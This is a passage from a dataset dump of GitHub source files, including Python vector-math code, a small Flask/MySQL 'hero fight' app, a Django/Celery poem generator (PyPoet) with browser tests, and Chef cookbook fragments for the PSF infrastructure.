self.x*another_vector.y - self.y*another_vector.x\n )\n\n def proj(self, project_to):\n assert type(project_to) is Vector_3d\n return self.dot(project_to)/abs(project_to) * project_to.unit()\n\n def perp(self, perpendicular_to):\n assert type(perpendicular_to) is Vector_3d\n return self - self.proj(perpendicular_to)\n\ndef main():\n ERROR = 10**(-10)\n # Verify Vector properties\n P = Vector_3d(1, 1, 1)\n Q = Vector_3d(2, 3, 3)\n print( (P + Q) == (Q + P) )\n R = Vector_3d(3, 4, 5)\n print( ((P+Q) + R) == (P + (Q+R)) )\n a = 2\n b = 3\n print( ((a*b) * P) == (a * (b*P)) )\n print( (a * (P+Q)) == (a*P + a*Q) )\n print( ((a+b) * P) == (a*P + b*P) )\n print(\"-\"*10)\n # Verify the abs of vector\n V = Vector_3d(3, 4, 0)\n print(abs(V))\n print(abs(a*V) == abs(a)*abs(V))\n print(abs(P+Q) <= abs(P) + abs(Q))\n print(\"-\"*10)\n # Verify the dot product\n print( P.dot(Q) == Q.dot(P) )\n print( (a*P).dot(Q) == a*(Q.dot(P)) )\n print( P.dot(Q+R) == P.dot(Q) + P.dot(R) )\n print( abs(P.dot(P) - abs(P)**2) < ERROR )\n print( abs(P.dot(Q)) <= abs(P)*abs(Q) )\n print(\"-\"*10)\n # Verify unit vector\n S = Vector_3d(2, 0, 0)\n print(S.unit())\n print(\"-\"*10)\n # Verify vector projection and perpendicularity\n print(Q.proj(S))\n print(Q.perp(S))\n print(\"-\"*10)\n # Verify the cross product\n T = Vector_3d(0, 1, 0)\n print(S.cross(T))\n print(T.cross(S))\n print( abs(P.cross(Q).dot(P) - 0) < ERROR )\n print( abs(P.cross(Q).dot(Q) - 0) < ERROR )\n print( Q.cross(P) == -(P.cross(Q)) )\n print( (a*P).cross(Q) == a*(P.cross(Q)) )\n print( P.cross(Q+R) == P.cross(Q) + P.cross(R) )\n Z = Vector_3d(0, 0, 0)\n print( P.cross(P) == Z )\n print( P.cross(Q).dot(R) == R.cross(P).dot(Q) == Q.cross(R).dot(P) == -Q.cross(P).dot(R) )\n print( P.cross(Q.cross(P)) == P.cross(Q).cross(P) == (P.dot(P)*Q - P.dot(Q)*P) )\n print( P.cross(Q).cross(R) != P.cross(Q.cross(R)) )\n print(\"-\"*10)\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.4679376184940338,
"alphanum_fraction": 0.49046793580055237,
"avg_line_length": 17.03125,
"blob_id": "f52918a708edfc57727a70ca6e402fa0c0306c94",
"content_id": "421f83aaf0d5c3b14dcc9f2d758ba2836a912987",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 577,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 32,
"path": "/python/math_tools.py",
"repo_name": "BillMaZengou/maths_3d_algorithm",
"src_encoding": "UTF-8",
"text": "def Sqrt(r):\n x = r\n eplison = 10 ** (-10)\n\n while abs(x * x - r) > eplison:\n x = (x + r / x) / 2\n return x\n\ndef main():\n import matplotlib.pyplot as plt\n import numpy as np\n import time\n\n a = []\n result = []\n start_time = time.time()\n period = []\n\n for i in np.arange(0, 10000, 0.5):\n a.append(i)\n k = Sqrt(i)\n end_time = time.time()\n result.append(k)\n period.append(end_time-start_time)\n start_time = end_time\n\n plt.plot(a, period)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 4 |
SampathKumarL/PIXLIE-SOL | https://github.com/SampathKumarL/PIXLIE-SOL | d0700f986c2de005ed996d9ab193d950ae96eadf | 8c2427a4569128e92fb3e7a30c2f9fcb1538b9f2 | 1dacec29509a38200dc707c4c8fe93d926f77002 | refs/heads/master | 2020-04-17T14:37:50.075678 | 2019-01-20T14:48:44 | 2019-01-20T14:48:44 | 166,664,487 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6070038676261902,
"alphanum_fraction": 0.6167315244674683,
"avg_line_length": 38.46154022216797,
"blob_id": "fbfe30e3c759388f1318ab409c25ce6c1085fa04",
"content_id": "da5d1c71d69246833dc409df9621db02dfbabbc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 514,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 13,
"path": "/README.md",
"repo_name": "SampathKumarL/PIXLIE-SOL",
"src_encoding": "UTF-8",
"text": "# PIXLIE-SOL\n1. Create a new directory and go to that path using command prompt and copy this file there.\n2. Create a virtual environment:\n python -m venv venv\n3. Activate that by running:\n cd venv \n cd Scripts\n activate (after typing this hit \"Enter\")\n4. come back to project native dir:\n cd ../..\n5. Run your program:\n python pixlie.py\n [ Install flask and pymysql and change password 'tiger' as password of your mysql ] \n"
},
{
"alpha_fraction": 0.5812783241271973,
"alphanum_fraction": 0.5943633913993835,
"avg_line_length": 22.2560977935791,
"blob_id": "e2683b2a43d1abe1159672ddf3a7012fa1ac55c4",
"content_id": "75817fb294130c08dea4a1415d8c5b4fd9744946",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1987,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 82,
"path": "/pixlie.py",
"repo_name": "SampathKumarL/PIXLIE-SOL",
"src_encoding": "UTF-8",
"text": "from flask import Flask\r\nimport pymysql\r\nimport json\r\n\r\ndb = pymysql.connect(\"localhost\", \"root\", \"tiger\", \"pixlie\")\r\n\r\napp = Flask(__name__)\r\n\r\[email protected](\"/\")\r\ndef home():\r\n return \"Hello, World!\"\r\n\r\[email protected](\"/create\")\r\ndef create_hero():\r\n\ttry:\r\n\t\tcursor = db.cursor()\r\n\t\tsql = \"insert into hero(score) values(0)\"\r\n\t\tcursor.execute(sql)\r\n\t\tdb.commit()\r\n\texcept Exception as ex:\r\n\t\treturn str(ex)\r\n\treturn (\"Hero Created\")\r\n\t\r\[email protected](\"/fight\")\r\ndef fight():\r\n\tcursor = db.cursor()\r\n\tx,y= 0,0\r\n\ttry : \r\n\t\tquery = '''SELECT * FROM hero ORDER BY RAND() LIMIT 2'''\r\n\t\tcursor.execute(query)\r\n\t\tresults = cursor.fetchall()\r\n\t\t\r\n\t\tx,y = results[0], results[1]\r\n\t\tprint(x[0],\" \",y[0])\r\n\t\tprint(\"query: \", \"update hero set score = score+1 where id = \"+ str(x[0]))\r\n\t\tcursor.execute('update hero set score = score+1 where id =' + str(x[0]))\r\n\t\tcursor.execute('delete from hero where id =' + str(y[0]))\r\n\t\tdb.commit()\r\n\texcept :\r\n\t\treturn(\"Only one person remaining\")\r\n\tdict = {'win':x[0],'win_score_x':x[1],'lose':y[0]}\r\n\treturn json.dumps(dict)\r\n\t\r\[email protected](\"/become_champ\")\r\ndef become_champ():\r\n\t\r\n\tcursor = db.cursor()\r\n\tid_to_save = 0\r\n\ttry : \r\n\t\tid_with_max_score = '''select * from hero where score = (select MAX(score) from hero)'''\r\n\t\tcursor.execute(id_with_max_score)\r\n\t\tresults = cursor.fetchone()\r\n\t\tid_to_save = results[0]\r\n\t\t\r\n\t\tquery = ''' Select * from hero '''\r\n\t\tcursor.execute(query)\r\n\t\tresults = cursor.fetchall()\r\n\t\t\r\n\t\tfor r in results:\r\n\t\t\tif r[0] != id_to_save:\r\n\t\t\t\tcursor.execute('delete from hero where id = '+str(r[0]))\r\n\t\t\t\tprint(str(r[0]))\r\n\t\tdb.commit()\r\n\texcept Exception as ex:\r\n\t\treturn(str(ex))\r\n\t\t\r\n\tdict = {'champ':id_to_save}\r\n\treturn json.dumps(dict)\r\n\t\r\[email protected](\"/all\")\r\ndef all():\r\n\tcursor = db.cursor()\r\n\tquery = '''SELECT * FROM hero'''\r\n\tcursor.execute(query)\r\n\tresults = cursor.fetchall()\r\n\tstr1 = \"\"\r\n\tfor r in results:\r\n\t\tstr1 += str(r[0])+\" : \"+str(r[1])+\" </br>\"\r\n\treturn str1\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)"
}
] | 2 |
Nick-the-BinaryTree/PyPoetWeb | https://github.com/Nick-the-BinaryTree/PyPoetWeb | 22543221e8028275c36cd22b1f53bf93b707661a | aff8fe95dfd2fef5ab47937fb74d78061b42298b | 929404d051fd558bc5167b638d24cfaf593598ea | refs/heads/master | 2021-01-11T21:19:45.722249 | 2017-02-11T21:01:39 | 2017-02-11T21:01:39 | 78,763,860 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7811321020126343,
"alphanum_fraction": 0.7861635088920593,
"avg_line_length": 40.842105865478516,
"blob_id": "f1dcdcf3f76faf4e51002d725c979480dca32742",
"content_id": "627b32a21dbccb7dadecfa67faf1ca7f31c421e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 797,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 19,
"path": "/README.md",
"repo_name": "Nick-the-BinaryTree/PyPoetWeb",
"src_encoding": "UTF-8",
"text": "# PyPoetWeb\nWeb app that generates poetry from large bodies of text.\n\nFrameworks and Libraries:\n* Natural Language Processing Library\n* NLTK Punkt Tokenizers\n* Python Pronouncing Library\n* Django Web App Framework\n* Celery Distributed Task Que (Multithreading)\n* RabbitMQ Message Broker (Wrapped by Celery)\n* Python Splinter Browser Testing\n* Selenium Browser Automation (Wrapped by Splinter)\n* Bootstrap (HTML, CSS, and JS Framework)\n* jQuery (Javascript Library)\n\nNote: My design philosophy emphasizes simplicity, and I did not enjoy adding all these dependencies, but it was necessary and attests to the complexity of the project.\n\nWorks Cited (I never thought I would have to do this on GitHub):\nBird, Steven, Edward Loper and Ewan Klein (2009), Natural Language Processing with Python. O’Reilly Media Inc.\n"
},
{
"alpha_fraction": 0.5116279125213623,
"alphanum_fraction": 0.5323695540428162,
"avg_line_length": 32.87234115600586,
"blob_id": "18d415d77ac131c25c7a30040e199328e6719a85",
"content_id": "42f34ca40e3ee1204218a7d68e8b8b29f10349e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1591,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 47,
"path": "/PyPoet/tests.py",
"repo_name": "Nick-the-BinaryTree/PyPoetWeb",
"src_encoding": "UTF-8",
"text": "from django.test import TestCase\nfrom splinter import Browser\nimport time\n\n# Create your tests here.\nclass PyPoetTestCase(TestCase):\n with Browser() as browser:\n url = \"http://localhost:8000/\"\n browser.visit(url)\n submit = browser.find_by_id('submit_button')\n submit.click()\n print(\"Clicked submit [default]\")\n while browser.is_text_not_present('100%'):\n time.sleep(3)\n print(\"Sleeping [default]\")\n print(\"Done [default]\")\n time.sleep(10)\n\n def test_quick(self):\n with Browser() as browser:\n url = \"http://localhost:8000/\"\n browser.visit(url)\n browser.fill('TotalLines', \"1\")\n print(\"Filled forms [quick]\")\n submit = browser.find_by_id('submit_button')\n submit.click()\n print(\"Clicked submit [quick]\")\n while browser.is_text_not_present('100%'):\n time.sleep(3)\n print(\"Sleeping [quick]\")\n print(\"Done [quick]\")\n time.sleep(10)\n\n def test_long(self):\n with Browser() as browser:\n url = \"http://localhost:8000/\"\n browser.visit(url)\n browser.fill('TotalLines', \"11\")\n print(\"Filled forms [long]\")\n submit = browser.find_by_id('submit_button')\n submit.click()\n print(\"Clicked submit [long]\")\n while browser.is_text_not_present('100%'):\n time.sleep(3)\n print(\"Sleeping [long]\")\n print(\"Done [long]\")\n time.sleep(10)"
},
{
"alpha_fraction": 0.5323806405067444,
"alphanum_fraction": 0.5387656092643738,
"avg_line_length": 31.899999618530273,
"blob_id": "084722f09289704d5fda7a9fd0745318dc022563",
"content_id": "64ac1da953f99ef5029b3f08326adc4f7ffb0301",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3289,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 100,
"path": "/PyPoet/views.py",
"repo_name": "Nick-the-BinaryTree/PyPoetWeb",
"src_encoding": "UTF-8",
"text": "from django.views import generic\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nimport celery.task.control\nfrom celery.result import ResultSet\nfrom . import tasks\n\nresults = ResultSet([])\n\n# Create your views here.\nclass IndexView(generic.TemplateView):\n template_name = 'PyPoet/index.html'\n\n# def submit(request):\n# if not request.method == 'GET':\n# cl = 0\n# p = \"\"\n# lines = {}\n# url = request.POST[\"URL\"]\n# si = request.POST[\"StartIndex\"]\n# tl = request.POST[\"TotalLines\"]\n# sl = request.POST[\"SentenceLength\"]\n# st = request.POST[\"SentenceThreshold\"]\n# if \"CurrentLine\" in request.POST and request.POST[\"CurrentLine\"] != \"\":\n# cl = request.POST[\"CurrentLine\"]\n# cl = int(cl)\n# p = request.POST[\"Progress\"]\n# if int(tl) - cl == 1:\n# print(\"\\n\\nADDING ONE\")\n# print(\"Current Line: \" + str(cl) + \"\\n\\n\")\n# lines = poemAdd(url, si, sl, st, cl, p, False)\n# else:\n# lines = poemAdd(url, si, sl, st, cl, p, True)\n# return render(request, \"PyPoet/index.html\",\n# {\"output\": lines[\"output\"],\n# \"cl\" : lines[\"cl\"],\n# \"tl\" : tl,\n# \"url\" : url,\n# \"si\" : si,\n# \"sl\" : sl,\n# \"st\" : st,\n# })\n# return HttpResponse(\"Something went terribly wrong.\")\n#\n# def poemAdd(url, si, sl, st, cl, p, twoLines):\n# output = \"\" # -1 random start index, 2 for 2 lines\n#\n# if twoLines:\n# failLimit = 0\n#\n# for i in range(failLimit+1):\n# output = tasks.getTwoLines(p, url, si, 2, sl, st)\n# if not \"Could not complete\" in output:\n# break\n#\n# return {\"output\" : output, \"cl\": cl + 2}\n# output = tasks.getOneLine(p, url, si, 1, sl, st)\n# return {\"output\": output, \"cl\": cl + 1}\n\ndef submit(request):\n stopAll()\n global results\n if not request.method == 'GET':\n url = request.POST[\"URL\"]\n si = request.POST[\"StartIndex\"]\n tl = request.POST[\"TotalLines\"]\n sl = request.POST[\"SentenceLength\"]\n st = request.POST[\"SentenceThreshold\"]\n tl = int(tl)\n for i in range(1, tl, 2):\n results.add(tasks.poemAdd.delay(url, si, sl, st, True))\n\n if tl % 2 == 1:\n results.add(tasks.poemAdd.delay(url, si, sl, st, False))\n\n return JsonResponse({'Down to':'business'})\n return HttpResponse(\"Something went terribly wrong.\")\n\ndef leaving(request):\n stopAll()\n return JsonResponse({'Good':'bye'})\n\ndef update(request):\n global results\n done = results.completed_count()\n total = len(results)\n # progStr = \"Progress: \" + str(done) + \" / \" + str(total) + \" operations\"\n if total == 0:\n progStr = 0\n else:\n progStr = done/total*100\n if results.ready() and total != 0:\n return JsonResponse({'progress':progStr, 'output':results.get()})\n return JsonResponse({'progress':progStr})\n\ndef stopAll():\n global results\n results.revoke(terminate=True)\n results.clear()\n celery.task.control.discard_all()"
},
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6855983734130859,
"avg_line_length": 37,
"blob_id": "d2459596e451142bd42f7483ca63ab0b652243ae",
"content_id": "89f6766c6386c6d95739e6ac8f7e1a04e87da043",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 493,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 13,
"path": "/PyPoet/models.py",
"repo_name": "Nick-the-BinaryTree/PyPoetWeb",
"src_encoding": "UTF-8",
"text": "# from django.db import models\n#\n# # Create your models here.\n# class Prompt(models.Model):\n# url_text = models.CharField(max_length=200)\n# start_index_text = models.CharField(max_length=200)\n# total_lines_text = models.CharField(max_length=200)\n# target_sentence_length_text = models.CharField(max_length=200)\n# sentence_length_threshold = models.CharField(max_length=200)\n# result_text = models.TextField()\n#\n# def __str__(self):\n# return self.prompt_text"
},
{
"alpha_fraction": 0.5916824340820312,
"alphanum_fraction": 0.6049149632453918,
"avg_line_length": 26.894737243652344,
"blob_id": "dd9c04ef8ae2a1bb7349b6f40eec30f90783235e",
"content_id": "c7e3ad902842d93f6c3c46990b7ab09dd37cea54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 19,
"path": "/PyPoet/tasks.py",
"repo_name": "Nick-the-BinaryTree/PyPoetWeb",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import, unicode_literals\nfrom .celery import app\nfrom . import PyPoetMod\n\[email protected]\ndef poemAdd(url, si, sl, st, twoLines):\n output = \"\" # -1 random start index, 2 for 2 lines\n\n if twoLines:\n FAIL_LIMIT = 5\n\n for i in range(FAIL_LIMIT+1):\n output = PyPoetMod.getTwoLines(\"\", url, si, 2, sl, st)\n if not \"Could not complete\" in output:\n break\n\n return output\n output = PyPoetMod.getOneLine(\"\", url, si, 1, sl, st)\n return output"
},
{
"alpha_fraction": 0.628016471862793,
"alphanum_fraction": 0.6358642578125,
"avg_line_length": 34.65034866333008,
"blob_id": "2f9490ed26fcc5ecc876c6003e96648b0de359cb",
"content_id": "43eb587b4f4372c73d00f62bea7bcfeb625d7ca3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5097,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 143,
"path": "/PyPoet/PyPoetMod.py",
"repo_name": "Nick-the-BinaryTree/PyPoetWeb",
"src_encoding": "UTF-8",
"text": "import nltk\nimport pronouncing\nfrom urllib.request import Request, urlopen\nfrom random import randint\n\ndef getRhymes(word):\n return pronouncing.rhymes(word.lower())\n\n\ndef isRhyme(word1, word2, rhymes):\n isPass = word2 in rhymes\n print(\"Do \" + word2 + \" and \" + word1 + \" rhyme? \" + str(isPass))\n return isPass\n\ndef getSentences(fileName):\n if fileName[:4] == \"http\":\n req = Request(fileName, headers={'User-Agent': 'Mozilla/5.0'})\n data = urlopen(req).read().decode('utf-8', errors='replace')\n else:\n fp = open(fileName)\n data = fp.read()\n tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n final = []\n for sen in tokenizer.tokenize(data):\n final.append(sen.replace(\"\\n\",\" \"))\n return final\n\ndef isBase(foundCount):\n return foundCount % 2 == 0\n\ndef clean(s):\n s = s.rstrip('?:!.,;\"\\'')\n return s.lstrip('?:!.,;\"\\'')\n\ndef getLastWord(sen):\n lastWord = sen.split()[-1]\n lastWord = clean(lastWord)\n return lastWord.lower()\n\ndef senChecks(sen, rhymeWith, foundCount, SENTENCE_LENGTH, SENTENCE_THRESHOLD, RHYMES_THRESHOLD = 3):\n fitsLength = SENTENCE_LENGTH - SENTENCE_THRESHOLD <= len(sen.split()) \\\n <= SENTENCE_LENGTH + SENTENCE_THRESHOLD\n lastWord = getLastWord(sen)\n rhymes = getRhymes(lastWord)\n\n if isBase(foundCount):\n return fitsLength and len(rhymes) > RHYMES_THRESHOLD\n else:\n return fitsLength and isRhyme(lastWord, rhymeWith, rhymes)\n\ndef randIndex(numSentences):\n return randint(0, numSentences)\n\ndef buildPoem(sentences, START_INDEX, TOTAL_LINES, SENTENCE_LENGTH, SENTENCE_TARGET):\n numSentences = len(sentences)\n if START_INDEX < 0 or START_INDEX > numSentences:\n START_INDEX = randIndex(numSentences)\n else:\n START_INDEX += (randIndex(numSentences-START_INDEX))\n\n foundCount = 0\n lastWord = \"\"\n final = \"\"\n\n for i in range(START_INDEX, len(sentences)):\n if not foundCount < TOTAL_LINES:\n break\n\n sen = sentences[i]\n # print(\"Checking \" + sen)\n\n if senChecks(sen, lastWord, foundCount, SENTENCE_LENGTH, SENTENCE_TARGET):\n foundCount += 1\n lastWord = getLastWord(sen)\n print(\"Last Word: \" + lastWord)\n final += \"<br>\" + clean(\"\".join(sen))\n\n if foundCount < TOTAL_LINES:\n final += \"<br>Could not complete.\"\n\n return final\n\ndef validateInput(URL, START_INDEX, TOTAL_LINES, SENTENCE_LENGTH, SENTENCE_THRESHOLD):\n\n START_INDEX = int(START_INDEX)\n TOTAL_LINES = int(TOTAL_LINES)\n SENTENCE_LENGTH = int(SENTENCE_LENGTH)\n SENTENCE_THRESHOLD = int(SENTENCE_THRESHOLD)\n\n if TOTAL_LINES < 0:\n TOTAL_LINES = 0\n if SENTENCE_LENGTH < 0:\n SENTENCE_LENGTH = 0\n if SENTENCE_THRESHOLD < 0:\n SENTENCE_THRESHOLD = 0\n\n print()\n print(\"File location: \" + URL)\n print(\"Start index: \" + str(START_INDEX))\n print(\"Target lines: \" + str(TOTAL_LINES))\n print(\"Target sentence length: \" + str(SENTENCE_LENGTH))\n print(\"Target sentence length threshold: \" + str(SENTENCE_THRESHOLD))\n print()\n\n return {\"si\" : START_INDEX, \"tl\" : TOTAL_LINES, \"sl\" : SENTENCE_LENGTH, \"st\" : SENTENCE_THRESHOLD}\n\ndef getPoem(URL, START_INDEX = 154, TOTAL_LINES = 4, SENTENCE_LENGTH = 5, SENTENCE_THRESHOLD = 15):\n try:\n valid = validateInput(URL, START_INDEX, TOTAL_LINES, SENTENCE_LENGTH, SENTENCE_THRESHOLD)\n START_INDEX = valid[\"si\"]\n TOTAL_LINES = valid[\"tl\"]\n SENTENCE_LENGTH = valid[\"sl\"]\n SENTENCE_THRESHOLD = valid[\"st\"]\n return(\"\\n\\n\" + buildPoem(getSentences(URL), START_INDEX, TOTAL_LINES, SENTENCE_LENGTH, SENTENCE_THRESHOLD))\n except TypeError as e:\n print(e)\n return(\"Input error (maybe try another URL, and check the settings).\")\n\n\ndef getTwoLines(DONE, URL, START_INDEX=-1, TOTAL_LINES=2, SENTENCE_LENGTH=5, SENTENCE_THRESHOLD=15):\n # return DONE+\"one<br>two<br><br>\"\n try:\n valid = validateInput(URL, START_INDEX, TOTAL_LINES, SENTENCE_LENGTH, SENTENCE_THRESHOLD)\n START_INDEX = valid[\"si\"]\n TOTAL_LINES = valid[\"tl\"]\n SENTENCE_LENGTH = valid[\"sl\"]\n SENTENCE_THRESHOLD = valid[\"st\"]\n return (DONE + \"<br>\" + buildPoem(getSentences(URL), START_INDEX, TOTAL_LINES, SENTENCE_LENGTH, SENTENCE_THRESHOLD))\n except TypeError as e:\n print(e)\n return (\"Input error (maybe try another URL, and check the settings).\")\n\ndef getOneLine(DONE, URL, START_INDEX=-1, TOTAL_LINES=1, SENTENCE_LENGTH=5, SENTENCE_THRESHOLD=15):\n try:\n valid = validateInput(URL, START_INDEX, TOTAL_LINES, SENTENCE_LENGTH, SENTENCE_THRESHOLD)\n START_INDEX = valid[\"si\"]\n TOTAL_LINES = valid[\"tl\"]\n SENTENCE_LENGTH = valid[\"sl\"]\n SENTENCE_THRESHOLD = valid[\"st\"]\n return (DONE + \"<br><br>\" + buildPoem(getSentences(URL), START_INDEX, TOTAL_LINES, SENTENCE_LENGTH, SENTENCE_THRESHOLD))\n except TypeError as e:\n print(e)\n return (\"Input error (maybe try another URL, and check the settings).\")"
},
{
"alpha_fraction": 0.7471264600753784,
"alphanum_fraction": 0.7471264600753784,
"avg_line_length": 16.399999618530273,
"blob_id": "ac3cd544a9d3302617bd7208ceeee2e1eaba7327",
"content_id": "c8200be061c622619d46cfe513eadbcf11b10d58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/PyPoet/apps.py",
"repo_name": "Nick-the-BinaryTree/PyPoetWeb",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass PypoetConfig(AppConfig):\n name = 'PyPoet'\n"
},
{
"alpha_fraction": 0.5414847135543823,
"alphanum_fraction": 0.5764192342758179,
"avg_line_length": 31.714284896850586,
"blob_id": "64f1b86dc5ccf886aa95142a308318f3e5c8c3d5",
"content_id": "7534efcb6a39a5fcb65ee8346de27a47eed10b6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 916,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 28,
"path": "/PyPoet/migrations/0001_initial.py",
"repo_name": "Nick-the-BinaryTree/PyPoetWeb",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-01-12 18:06\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Prompt',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('url_text', models.CharField(max_length=200)),\n ('start_index_text', models.CharField(max_length=200)),\n ('total_lines_text', models.CharField(max_length=200)),\n ('target_sentence_length_text', models.CharField(max_length=200)),\n ('sentence_length_threshold', models.CharField(max_length=200)),\n ('result_text', models.TextField()),\n ],\n ),\n ]\n"
}
] | 8 |
python/psf-chef | https://github.com/python/psf-chef | fb448aea853cf7772a20cd7a23d312b32d62fffc | e5de0cdc1eea725e099690d095a25f9cd1ae9861 | 7101ac7f50ca1efc38643a32ed52908b958843d3 | refs/heads/master | 2023-08-28T20:02:59.451586 | 2020-02-13T13:32:37 | 2020-02-13T13:32:37 | 4,389,262 | 31 | 23 | null | 2012-05-21T02:31:56 | 2020-02-13T13:32:41 | 2020-02-13T13:34:46 | Ruby | [
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 14.399999618530273,
"blob_id": "79eeecf8df1094b7af425310430a8b5429e51a44",
"content_id": "329b8c861035c56837db7f76177dfcf79082e91a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 5,
"path": "/cookbooks/psf-misc/recipes/sudo.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "include_recipe \"sudo\"\n\nsudo \"env_keep\" do\n template \"sudo_env_keep.erb\"\nend\n"
},
{
"alpha_fraction": 0.601190447807312,
"alphanum_fraction": 0.636904776096344,
"avg_line_length": 27,
"blob_id": "08b2b9f58e80270e8f685dbf0671ce7e4d2b4c7e",
"content_id": "3eca99c8e6edb187c8264b0d1c7b898a10d6189d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 168,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 6,
"path": "/cookbooks/user/test/support/Gemfile",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "source \"https://rubygems.org\"\n\ngem 'rake'\ngem 'minitest'\ngem 'chef', (ENV['CHEF_VERSION'] ? ENV['CHEF_VERSION'] : '~> 0.10.8')\ngem 'foodcritic', :platforms => :ruby_19\n"
},
{
"alpha_fraction": 0.5547618865966797,
"alphanum_fraction": 0.6571428775787354,
"avg_line_length": 59,
"blob_id": "13265390b7c455553282831fd628301b310ffa1d",
"content_id": "c1a592e02cf7921a1b4d9051c2eb2beabdd1f5d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 7,
"path": "/cookbooks/psf-monitoring/attributes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "node.set['graphite']['carbon']['line_receiver_port'] = 2002\nnode.set['graphite']['carbon']['line_receiver_interface'] = \"127.0.0.1\"\nnode.set['graphite']['carbon']['pickle_receiver_interface'] = \"127.0.0.1\"\nnode.set['graphite']['carbon']['cache_query_interface'] = \"127.0.0.1\"\nnode.set['riemann']['server'] = '140.211.10.83'\nnode.set['collectd']['version'] = '4.10'\nnode.set['graphite']['server_address'] = '140.211.10.83'\n"
},
{
"alpha_fraction": 0.6326530575752258,
"alphanum_fraction": 0.6632652878761292,
"avg_line_length": 18.200000762939453,
"blob_id": "e5307064bbc0d0e434c42f5015c800b4245b786a",
"content_id": "b6829241faa800db3d3009b9a48fd28efbb89a6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 98,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 5,
"path": "/cookbooks/psf-misc/recipes/ops-scripts.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "\ncookbook_file '/usr/local/bin/fix-deny-hosts' do\n mode \"744\"\n owner \"root\"\n group \"root\"\nend\n\n"
},
{
"alpha_fraction": 0.540229856967926,
"alphanum_fraction": 0.5593869686126709,
"avg_line_length": 28,
"blob_id": "f9a11aa6b791b71d2bb72210323904d3fee4e00d",
"content_id": "1e2ea621551115afebed38ed30b3d7163ee54a35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 9,
"path": "/cookbooks/psf-search/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"psf-search\"\nmaintainer \"Donald Stufft\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Setups up Nginx for Elasticsearch Cluster\"\nversion \"0.0.2\"\n\ndepends \"nginx\"\ndepends \"firewall\"\n"
},
{
"alpha_fraction": 0.6179487109184265,
"alphanum_fraction": 0.6365384459495544,
"avg_line_length": 17.571428298950195,
"blob_id": "df681b2d00a3b4bac390d29e161373019e5d774d",
"content_id": "e4988d6336167ab0136ebb3ac5185c86c6f31e3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1560,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 84,
"path": "/cookbooks/psf-moin/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
